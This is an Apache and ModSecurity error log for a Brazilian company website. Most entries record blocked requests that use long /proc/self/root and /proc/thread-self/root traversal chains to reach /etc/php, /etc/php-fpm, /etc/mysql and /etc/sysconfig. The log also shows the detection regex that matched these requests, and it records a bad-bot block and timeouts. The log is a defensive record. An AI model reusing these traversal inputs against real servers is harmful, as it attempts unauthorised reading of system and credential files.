[Thu Mar 19 02:02:39.551713 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:54820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDb_u8EFLIOrSqIptUJQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:02:46.367066 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49348] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:02:46.927272 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:52180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDdvu8EFLIOrSqIptUKQAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:02:52.899254 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:37682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDfPu8EFLIOrSqIptULgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:03:10.113826 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:03:11.195501 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:34230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDjwkwaGbbGflqUZBqXAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:03:20.443543 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:54656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDmAkwaGbbGflqUZBqYwAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:03:20.913616 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.228.61:49294] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuDmBkFeYa1D6dYQnClagAAAdM"]
[Thu Mar 19 02:03:23.811613 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:50724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDmwkwaGbbGflqUZBqZQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:03:35.141782 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50430] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:03:36.098531 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.241.31:50728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDqBkFeYa1D6dYQnClcgAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:03:41.679669 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:40804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDrQbLMZ6AikZjR9UWUwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:03:58.058097 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50846] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:04:02.134656 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:40806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDwsdf6f5d65gmYZQrBAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:04:08.478643 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:55310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDyOoXxyEfFpUF8f_LQQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:04:15.994633 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:55326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuDz_u8EFLIOrSqIptUTQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:04:24.138989 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51410] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:04:39.292515 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.52:52404] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:04:51.041794 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:05:14.672833 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:45384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuECgkwaGbbGflqUZBqiAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 02:05:19.160950 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:05:46.920868 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.244.43:44346] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuEKv-YZRR_7pZ7nDJG9wAAA9Y"]
[Thu Mar 19 02:05:51.133795 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:06:00.861587 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.5:54180] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:06:16.033819 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53602] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:06:38.033819 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54020] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:06:59.130049 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:07:21.137781 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54852] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:07:25.127643 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:35324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEjQbLMZ6AikZjR9UWzAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:07:29.182015 2026] [mime_magic:error] [pid 27293:tid 140411548894976] (70014)End of file found: [client 57.141.18.112:55946] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:07:33.332601 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:45608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuElV_V7PWP6ixUYl51ZwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:07:46.089017 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55304] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:07:48.105023 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:57218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEpAbLMZ6AikZjR9UW3QAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:07:56.457069 2026] [mime_magic:error] [pid 17887:tid 140411616036608] (70014)End of file found: [client 57.141.18.99:56858] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:07:56.960608 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 57.141.18.0:56868] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:07:59.509160 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:52048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEr-yqAr6etmhZHNoeDwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:08:04.374875 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:55692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEtP-YZRR_7pZ7nDJHQQAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:08:10.089318 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:55706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEuta6ubjKNq_cu4b0SwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:08:12.135562 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55904] AH01075: Error dispatching request to : (polling)
